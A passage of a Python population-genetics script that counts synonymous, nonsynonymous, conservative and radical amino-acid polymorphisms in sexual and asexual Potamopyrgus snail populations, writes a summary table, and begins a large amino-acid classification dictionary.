sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
asex_synS += 2
asex_sum2PQ_S += (2*twoPQ)
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\n')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
i += 1
asex_sum2PQ_S = str(asex_sum2PQ_S)
asex_sum2PQ_N = str(asex_sum2PQ_N)
asex_sum2PQ_C1 = str(asex_sum2PQ_C1)
asex_sum2PQ_C2 = str(asex_sum2PQ_C2)
asex_sum2PQ_C3 = str(asex_sum2PQ_C3)
asex_sum2PQ_C4 = str(asex_sum2PQ_C4)
asex_sum2PQ_C5 = str(asex_sum2PQ_C5)
asex_sum2PQ_C6 = str(asex_sum2PQ_C6)
asex_sum2PQ_C7 = str(asex_sum2PQ_C7)
asex_sum2PQ_R1 = str(asex_sum2PQ_R1)
asex_sum2PQ_R2 = str(asex_sum2PQ_R2)
asex_sum2PQ_R3 = str(asex_sum2PQ_R3)
asex_sum2PQ_R4 = str(asex_sum2PQ_R4)
asex_sum2PQ_R5 = str(asex_sum2PQ_R5)
asex_sum2PQ_R6 = str(asex_sum2PQ_R6)
asex_sum2PQ_R7 = str(asex_sum2PQ_R7)
asex_sum2PQ_meanC = str(asex_sum2PQ_meanC)
asex_sum2PQ_meanR = str(asex_sum2PQ_meanR)
asex_synS = str(asex_synS)
asex_nsynS = str(asex_nsynS)
asex_con1S = str(asex_con1S)
asex_con2S = str(asex_con2S)
asex_con3S = str(asex_con3S)
asex_con4S = str(asex_con4S)
asex_con5S = str(asex_con5S)
asex_con6S = str(asex_con6S)
asex_con7S = str(asex_con7S)
asex_meanConS = str(asex_meanConS)
asex_rad1S = str(asex_rad1S)
asex_rad2S = str(asex_rad2S)
asex_rad3S = str(asex_rad3S)
asex_rad4S = str(asex_rad4S)
asex_rad5S = str(asex_rad5S)
asex_rad6S = str(asex_rad6S)
asex_rad7S = str(asex_rad7S)
asex_meanRadS = str(asex_meanRadS)
summaryFile = open('mt_conRad_summary.txt','w')
summaryFile.write('\tS\tN\tmeanC\tmeanR\tC1\tR1\tC2\tR2\tC3\tR3\tC4\tR4\tC5\tR5\tC6\tR6\tC7\tR7\nP.antipodarum-P.estuarinus\t' + str(dS) + '\t' + str(dN) + '\t' + str(dMeanC) + '\t' + str(dMeanR) + '\t' + str(dC1) + '\t' + str(dR1) + '\t' + str(dC2) + '\t' + str(dR2) + '\t' + str(dC3) + '\t' + str(dR3) + '\t' + str(dC4) + '\t' + str(dR4) + '\t' + str(dC5) + '\t' + str(dR5) + '\t' + str(dC6) + '\t' + str(dR6) + '\t' + str(dC7) + '\t' + str(dR7) + '\nP.antipodarum-P.estuarinus Sites\nP.antipodarum-P.estuarinus D\nP.antipodarum-P.estuarinus k (JC-corrected)\nP. antipodarum-P.estuarinus var(k)\n\nP. antipodarum\t' + synS + '\t' + nsynS + '\t' + meanConS + '\t' + meanRadS + '\t' + con1S + '\t' + rad1S + '\t' + con2S + '\t' + rad2S + '\t' + con3S + '\t' + rad3S + '\t' + con4S + '\t' + rad4S + '\t' + con5S + '\t' + rad5S + '\t' + con6S + '\t' + rad6S + '\t' + con7S + '\t' + rad7S + '\n')
summaryFile.write('P.antipodarum Sites\nP.antipodarum sum(2*pq)\t' + sum2PQ_S + '\t' + sum2PQ_N + '\t' + sum2PQ_meanC + '\t' + sum2PQ_meanR + '\t' + sum2PQ_C1 + '\t' + sum2PQ_R1 + '\t' + sum2PQ_C2 + '\t' + sum2PQ_R2 + '\t' + sum2PQ_C3 + '\t' + sum2PQ_R3 + '\t' + sum2PQ_C4 + '\t' + sum2PQ_R4 + '\t' + sum2PQ_C5 + '\t' + sum2PQ_R5 + '\t' + sum2PQ_C6 + '\t' + sum2PQ_R6 + '\t' + sum2PQ_C7 + '\t' + sum2PQ_R7 + '\n')
summaryFile.write('P.antipodarum π\nP.antipodarum π/πS\nP. antipodarum aN\nP. antipodarum theta\nP.antipodarum theta/thetaS\n\n')
summaryFile.write('Sex\t' + sex_synS + '\t' + sex_nsynS + '\t' + sex_meanConS + '\t' + sex_meanRadS + '\t' + sex_con1S + '\t' + sex_rad1S + '\t' + sex_con2S + '\t' + sex_rad2S + '\t' + sex_con3S + '\t' + sex_rad3S + '\t' + sex_con4S + '\t' + sex_rad4S + '\t' + sex_con5S + '\t' + sex_rad5S + '\t' + sex_con6S + '\t' + sex_rad6S + '\t' + sex_con7S + '\t' + sex_rad7S + '\n')
summaryFile.write('Sex Sites\nSex sum(2*pq)\t' + sex_sum2PQ_S + '\t' + sex_sum2PQ_N + '\t' + sex_sum2PQ_meanC + '\t' + sex_sum2PQ_meanR + '\t' + sex_sum2PQ_C1 + '\t' + sex_sum2PQ_R1 + '\t' + sex_sum2PQ_C2 + '\t' + sex_sum2PQ_R2 + '\t' + sex_sum2PQ_C3 + '\t' + sex_sum2PQ_R3 + '\t' + sex_sum2PQ_C4 + '\t' + sex_sum2PQ_R4 + '\t' + sex_sum2PQ_C5 + '\t' + sex_sum2PQ_R5 + '\t' + sex_sum2PQ_C6 + '\t' + sex_sum2PQ_R6 + '\t' + sex_sum2PQ_C7 + '\t' + sex_sum2PQ_R7 + '\n')
summaryFile.write('Sex π\nSex π/πS\nSex aN\nSex theta\nSex theta/thetaS\n\n')
summaryFile.write('Asex\t' + asex_synS + '\t' + asex_nsynS + '\t' + asex_meanConS + '\t' + asex_meanRadS + '\t' + asex_con1S + '\t' + asex_rad1S + '\t' + asex_con2S + '\t' + asex_rad2S + '\t' + asex_con3S + '\t' + asex_rad3S + '\t' + asex_con4S + '\t' + asex_rad4S + '\t' + asex_con5S + '\t' + asex_rad5S + '\t' + asex_con6S + '\t' + asex_rad6S + '\t' + asex_con7S + '\t' + asex_rad7S + '\n')
summaryFile.write('Asex Sites\nAsex sum(2*pq)\t' + asex_sum2PQ_S + '\t' + asex_sum2PQ_N + '\t' + asex_sum2PQ_meanC + '\t' + asex_sum2PQ_meanR + '\t' + asex_sum2PQ_C1 + '\t' + asex_sum2PQ_R1 + '\t' + asex_sum2PQ_C2 + '\t' + asex_sum2PQ_R2 + '\t' + asex_sum2PQ_C3 + '\t' + asex_sum2PQ_R3 + '\t' + asex_sum2PQ_C4 + '\t' + asex_sum2PQ_R4 + '\t' + asex_sum2PQ_C5 + '\t' + asex_sum2PQ_R5 + '\t' + asex_sum2PQ_C6 + '\t' + asex_sum2PQ_R6 + '\t' + asex_sum2PQ_C7 + '\t' + asex_sum2PQ_R7 + '\n')
summaryFile.write('Asex π\nAsex π/πS\nAsex aN\nAsex theta\nAsex theta/thetaS\n\n')
summaryFile.close()
logfile.close()
def CRI(aaList):
aaSchemeList = [1,2,3,4,5,6,7]
aaSchemeDict = {1:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},2:{("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C",("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",(